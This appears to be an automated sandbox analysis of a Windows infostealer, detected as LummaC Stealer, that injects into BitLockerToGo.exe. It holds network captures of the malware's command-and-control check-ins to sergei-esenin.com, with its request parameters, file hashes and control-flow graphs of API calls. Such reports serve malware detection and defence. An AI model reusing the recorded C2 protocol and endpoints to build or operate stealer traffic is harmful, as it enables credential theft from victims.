2024-10-12 23:44:23 UTC | 3768 | IN | Data Raw: 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 73 75 6d 6d 61 72 79 5f 66 6f 6f 74 65 72 22 3e 0d 0a 09 09 09 09 09 09 09 3c 73 70 61 6e 20 64 61 74 61 2d 70 61 6e 65 6c 3d 22 7b 26 71 75 6f 74 3b 66 6f 63 75 73 61 62 6c 65 26 71 75 6f 74 3b 3a 74 72 75 65 2c 26 71 75 6f 74 3b 63 6c 69 63 6b 4f 6e 41 63 74 69 76 61 74 65 26 71 75 6f 74 3b 3a 74 72 75 65 7d 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 3e 56 69 65 77 20 6d 6f 72 65 20 69 6e 66 6f 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 20 24 4a 28 20 66 75 6e 63 74 69 6f 6e 28 29
    Data Ascii: <div class="profile_summary_footer"><span data-panel="{&quot;focusable&quot;:true,&quot;clickOnActivate&quot;:true}" class="whiteLink" class="whiteLink">View more info</span></div><script type="text/javascript"> $J( function()
2024-10-12 23:44:23 UTC | 171 | IN | Data Raw: 09 3c 73 70 61 6e 3e 56 69 65 77 20 6d 6f 62 69 6c 65 20 77 65 62 73 69 74 65 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 0d 0a 09 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 63 6f 6e 74 65 6e 74 20 2d 2d 3e 0d 0a 0d 0a 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 66 72 61 6d 65 20 2d 2d 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e
    Data Ascii: <span>View mobile website</span></div></div></div></div>... responsive_page_content --></div>... responsive_page_frame --></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.5 | 49751 | 104.21.53.8 | 443 | 3748 | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-12 23:44:24 UTC | 264 | OUT | POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: sergei-esenin.com
2024-10-12 23:44:24 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
    Data Ascii: act=life
2024-10-12 23:44:24 UTC | 553 | IN | HTTP/1.1 200 OK
    Date: Sat, 12 Oct 2024 23:44:24 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    X-Frame-Options: SAMEORIGIN
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SDAqIrp6r2B9K%2B7a60zwirDHrJcRylrSwGHP1WoZDv4Q%2BtCw4ryNUyRoG6IKCqjoOtXzW8aMsxKdMqF50X0oor2oReVCKyDgiN9WdE0BvwcmL71V7xWYsa4W3Fmj2PSbru%2B0tw%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8d1af5280bd70f8b-EWR
2024-10-12 23:44:24 UTC | 816 | IN | Data Raw: 31 31 35 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
    Data Ascii: 1151<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-10-12 23:44:24 UTC | 1369 | IN | Data Raw: 73 2f 63 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f
    Data Ascii: s/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('co
2024-10-12 23:44:24 UTC | 1369 | IN | Data Raw: 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 34 30 34 30 34 30 3b 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 62 6f 72 64 65 72 3a 20 30 3b 22 3e 4c 65 61 72 6e 20 4d 6f 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 66 6f 72 6d 20 61 63 74 69 6f 6e 3d 22 2f 63 64 6e 2d 63 67 69 2f 70 68 69 73 68 2d 62 79 70 61 73 73 22 20 6d 65 74 68 6f 64 3d 22 47 45 54 22 20 65 6e 63 74 79 70 65 3d 22 74 65 78 74 2f 70 6c 61 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70
    Data Ascii: ement/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action="/cdn-cgi/phish-bypass" method="GET" enctype="text/plain"> <inp
2024-10-12 23:44:24 UTC | 887 | IN | Data Raw: 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61
    Data Ascii: <span class="cf-footer-separator sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &amp; security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="bra
2024-10-12 23:44:24 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.5 | 49757 | 104.21.53.8 | 443 | 3748 | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-12 23:44:24 UTC | 354 | OUT | POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    Cookie: __cf_mw_byp=7dVCApaVSuJAHxS2hly8AvsgLmmtzBWUGr_DufxF.Bw-1728776664-0.0.1.1-/api
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 75
    Host: sergei-esenin.com
2024-10-12 23:44:24 UTC | 75 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 74 4c 59 4d 65 35 2d 2d 32 26 6a 3d 35 63 39 62 38 36 37 34 61 36 33 30 64 39 31 30 31 62 34 36 37 33 33 61 61 33 37 66 31 35 65 63
    Data Ascii: act=recive_message&ver=4.0&lid=tLYMe5--2&j=5c9b8674a630d9101b46733aa37f15ec
2024-10-12 23:44:25 UTC | 829 | IN | HTTP/1.1 200 OK
    Date: Sat, 12 Oct 2024 23:44:25 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=e924ihhgsiklj3if2tbjp3ktkj; expires=Wed, 05 Feb 2025 17:31:04 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=plseIaBzMv9Uk7BfI1yI5%2BCEgt%2FNJweyYlhD71ra2sOiSsT53AAZyjm2rLkg0qB0FrA2QG7NE5%2FMUfd8qc6jMt9Eyl6QZW2XJ9%2FF0Y4unbXzlUhrzZD0lY18M6BBTinRqBmd4Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                      CF-RAY: 8d1af52c8e900f97-EWR
                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                      2024-10-12 23:44:25 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                                                                                                                      Data Ascii: aerror #D12
                                                                                                                                                                                      2024-10-12 23:44:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                      Data Ascii: 0

Target ID: 0
Start time: 19:43:57
Start date: 12/10/2024
Path: C:\Users\user\Desktop\Setup-Premium.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\Setup-Premium.exe"
Imagebase: 0x450000
File size: 22'590'464 bytes
MD5 hash: 65AB8081D6A7F813A39BD06052FA5887
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.2173525211.0000000002800000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.2173525211.00000000029BF000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: true

Target ID: 2
Start time: 19:44:05
Start date: 12/10/2024
Path: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
Imagebase: 0x790000
File size: 231'736 bytes
MD5 hash: A64BEAB5D4516BECA4C40B25DC0C1CD8
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation: moderate
Has exited: true


Execution Graph

Execution Coverage: 2.4%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 29.2%
Total number of Nodes: 106
Total number of Limit Nodes: 8

Control-flow Graph (function at 0043A36A)
APIs
• SysAllocString.OLEAUT32 ref: 0043A3BD
• SysAllocString.OLEAUT32(29E12BF1), ref: 0043A487
Strings
Memory Dump Source
• Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Yara matches
Similarity
• API ID: AllocString
• String ID: fq$31$?=
• API String ID: 2525500382-1730420960

Control-flow Graph (function at 00410F13)
APIs
• GetSystemDirectoryW.KERNEL32(Gw,00000104), ref: 004113AC
Strings
Memory Dump Source
• Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Yara matches
Similarity
• API ID: DirectorySystem
• String ID: A1D9BE3B5D88E0D2045F52AD438D4AB4$Gw$GuD$Uki$ls$r$sergei-esenin.com$us$}/{
• API String ID: 2188284642-836274848

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        • Executed
                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                        control_flow_graph 187 43a1b0-43a201 188 43a210-43a224 187->188 188->188 189 43a226-43a243 188->189 191 43a272-43a2c3 CoCreateInstance 189->191 192 43a270 189->192 193 43a24a-43a263 189->193 191->191 191->192 191->193 192->191 193->192
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: :
                                                                                                                                                                                        • API String ID: 0-336475711
                                                                                                                                                                                        • Opcode ID: dd91123ec59b87012b6a916223a51725615a3d43cf5a21b046aada3358be593a
                                                                                                                                                                                        • Instruction ID: ce9e5ec331c6781234e92e466d7e6817b8b4649f9c01226947f4e35f75938b71
                                                                                                                                                                                        • Opcode Fuzzy Hash: dd91123ec59b87012b6a916223a51725615a3d43cf5a21b046aada3358be593a
                                                                                                                                                                                        • Instruction Fuzzy Hash: B22165745583409FE320CF14D845B4BBBA4FB86354F00891CE1E89A281CBBA990ACF9B

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        • Executed
                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                        control_flow_graph 248 43a2ca-43a2ff 249 43a300-43a308 248->249 249->249 250 43a30a-43a332 SysAllocString 249->250 251 43a336-43a33b 250->251
                                                                                                                                                                                        APIs
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: AllocString
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 2525500382-0
                                                                                                                                                                                        • Opcode ID: f200db4fca39053ab5bd00962dc80bab007449fdc3bc0a8806d2572082aa45aa
                                                                                                                                                                                        • Instruction ID: d36da009cc4dd5e60bddc90643fe47231d8199f9552208d5b93d0083e1a6bc38
                                                                                                                                                                                        • Opcode Fuzzy Hash: f200db4fca39053ab5bd00962dc80bab007449fdc3bc0a8806d2572082aa45aa
                                                                                                                                                                                        • Instruction Fuzzy Hash: C4F0E2B45083419FD340CF24D888A6AFBF4BB8A358F109D5DE49A9B242CB75D90ACB56
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: c2020858f1e77380c894873f28cf591c0b29d80ba21badbd67f27b9ff3b0a383
                                                                                                                                                                                        • Instruction ID: 2ef5a6a48b743b0f54ab3efd7c0e39c5e11684ee4858ef7e1b94a1d861c570b7
                                                                                                                                                                                        • Opcode Fuzzy Hash: c2020858f1e77380c894873f28cf591c0b29d80ba21badbd67f27b9ff3b0a383
                                                                                                                                                                                        • Instruction Fuzzy Hash: E42137729483108BD7255E28849033FBBD2ABCD311F1A953FDCDA8B781D63888515387

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        • Executed
                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                        control_flow_graph 155 40ccf0-40ccfe call 43f2d0 158 40cd04-40cd11 IsUserAnAdmin call 437160 155->158 159 40cebf-40cec1 ExitProcess 155->159 162 40cd17-40cd35 GetInputState 158->162 163 40ceba call 43fea0 158->163 164 40cd40-40cd52 162->164 163->159 164->164 166 40cd54-40cd7f GetCurrentThreadId GetCurrentProcessId 164->166 167 40cd80-40cda8 166->167 167->167 168 40cdaa-40cdb3 167->168 169 40cdc0-40cdd2 168->169 169->169 170 40cdd4-40cdd6 169->170 171 40ce04-40ce23 170->171 172 40cdd8-40cde9 170->172 173 40ce30-40cea5 171->173 174 40cdf0-40ce02 172->174 173->173 175 40cea7-40ceae call 40dd30 173->175 174->171 174->174 175->163 178 40ceb0 call 410ed0 175->178 180 40ceb5 call 40fa90 178->180 180->163
                                                                                                                                                                                        APIs
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: CurrentProcess$AdminExitInputStateThreadUser
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 2882748383-0
                                                                                                                                                                                        • Opcode ID: 2fc890891636a5cbb3b5a9e1d9161056095969d2b8c912405932f686e90a896f
                                                                                                                                                                                        • Instruction ID: 68d0f77aac29047e394b0bbc2eaef3045501e8c1bd0db20cb41e468de86552c5
                                                                                                                                                                                        • Opcode Fuzzy Hash: 2fc890891636a5cbb3b5a9e1d9161056095969d2b8c912405932f686e90a896f
                                                                                                                                                                                        • Instruction Fuzzy Hash: 6A418B3651C3508BD700AB78989625FBFC2DFD3320F198A3ED5D1973D1DA3848068796

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        • Executed
                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                        control_flow_graph 194 4400ba-4400c6 195 4400d0-4400ea 194->195 195->195 196 4400ec-440136 GetForegroundWindow call 443190 195->196
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • GetForegroundWindow.USER32 ref: 00440105
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: ForegroundWindow
                                                                                                                                                                                        • String ID: &'&!
                                                                                                                                                                                        • API String ID: 2020703349-380169441
                                                                                                                                                                                        • Opcode ID: 96905d6e1bcf70d78b9b649e623a1f7db9eac75b98cf7dc2506f5934903c6764
                                                                                                                                                                                        • Instruction ID: 080031c3278ea8674fddb578f845b271c6be9ac379e19be31f66d338dd870478
                                                                                                                                                                                        • Opcode Fuzzy Hash: 96905d6e1bcf70d78b9b649e623a1f7db9eac75b98cf7dc2506f5934903c6764
                                                                                                                                                                                        • Instruction Fuzzy Hash: B9F02B3AA182404BF3059B38A8656977BE4DB13319F10483AE5C1C7341D33AC504CB0A

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        • Executed
                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                        control_flow_graph 235 43fec0-43fed5 236 43ff57-43ff60 call 43daf0 235->236 237 43feea-43ff03 235->237 238 43fedc-43fee3 235->238 239 43ff4c-43ff55 call 43da60 235->239 246 43ff62 236->246 240 43ff10-43ff35 237->240 238->236 238->237 247 43ff65-43ff68 239->247 240->240 243 43ff37-43ff4a RtlReAllocateHeap 240->243 243->246 246->247
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • RtlReAllocateHeap.NTDLL(?,00000000,?,?), ref: 0043FF44
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: AllocateHeap
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 1279760036-0
                                                                                                                                                                                        • Opcode ID: 275ef8408927c5be473a40f6ed5ea4006717021c27589da326475695a5c6d16f
                                                                                                                                                                                        • Instruction ID: dcd895625f1de5df88afb4bc5f5436ec368ba6403bae32710f3a591e680433b3
                                                                                                                                                                                        • Opcode Fuzzy Hash: 275ef8408927c5be473a40f6ed5ea4006717021c27589da326475695a5c6d16f
                                                                                                                                                                                        • Instruction Fuzzy Hash: B00168B1F092018BF300AB34ED51B2B7B9ADBCD310F18893DE88047281D2398809C795

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        • Executed
                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                        control_flow_graph 252 43daf0-43dafe 253 43db05-43db08 252->253 254 43db09-43db19 252->254 255 43db20-43db32 254->255 255->255 256 43db34-43db49 RtlFreeHeap 255->256
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • RtlFreeHeap.NTDLL(?,00000000,?), ref: 0043DB40
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: FreeHeap
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 3298025750-0
                                                                                                                                                                                        • Opcode ID: a43016886cdb0d743cdf735ff3d04aa6dd5a06897827434755ebaf309b3355ac
                                                                                                                                                                                        • Instruction ID: 5629ad98e0ceb0e45337e72c9cd8d3a1c03c698a450e6e024db0fd128c61433c
                                                                                                                                                                                        • Opcode Fuzzy Hash: a43016886cdb0d743cdf735ff3d04aa6dd5a06897827434755ebaf309b3355ac
                                                                                                                                                                                        • Instruction Fuzzy Hash: F3F0A03450C2408BDB086B34FC62A2A7BA1EF86711F54447CD08A466E1DA3A983ADB56

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        • Executed
                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                        control_flow_graph 291 4400f7-44010e GetForegroundWindow call 443190 294 440113-440136 291->294
APIs
• GetForegroundWindow.USER32 ref: 00440105
Memory Dump Source
• Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Yara matches
Similarity
• API ID: ForegroundWindow
• String ID:
• API String ID: 2020703349-0
• Opcode ID: 2d53d53f86e8266488540f03f412994494972a2bb33454c47b24931968afb91b
• Instruction ID: 68f716a54a03f872c95ad112db681d3eb3fa2aa5e9f4ee1e80c164f252ba4ef0
• Opcode Fuzzy Hash: 2d53d53f86e8266488540f03f412994494972a2bb33454c47b24931968afb91b
• Instruction Fuzzy Hash: 9BE08C7EA042409FD600AF28FCA642537A0EF0621A3440439E086CB362C735A644CA09

Control-flow Graph
(rendered graph image; nodes were marked executed or not executed) block 295 at 43ff80-43ffb2: LdrInitializeThunk
APIs
• LdrInitializeThunk.NTDLL(004434FD,005C003F,00000006,?,?,00000018,?,?,?), ref: 0043FFAE
Memory Dump Source
• Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Yara matches
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
• Instruction ID: fb6f357373f259be8b0e83fffc5d2a3912a28e0da7d2036ce94b71e982b3a7e9
• Opcode Fuzzy Hash: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
• Instruction Fuzzy Hash: 76E0FE75908316AB9A09CF45C14444EFBE5BFC4714F11CC8DA4D867210D3B0AD46DF82
APIs
• CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0043A358
Memory Dump Source
• Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Yara matches
Similarity
• API ID: BlanketProxy
• String ID:
• API String ID: 3890896728-0
• Opcode ID: 43abf5545444225f419111632cb8d1e94a3e61122dabe52b65dcb97108d652bb
• Instruction ID: 6f453a55023168f30735fce91ea22db8b17a31a17328c721d80c23302acec5c7
• Opcode Fuzzy Hash: 43abf5545444225f419111632cb8d1e94a3e61122dabe52b65dcb97108d652bb
• Instruction Fuzzy Hash: E2D04C347D8304B6F1310B14ED17F043554B743F02F601060B3417C0E0CAF1A651965D
APIs
• CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00410F03
Memory Dump Source
• Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Yara matches
Similarity
• API ID: InitializeSecurity
• String ID:
• API String ID: 640775948-0
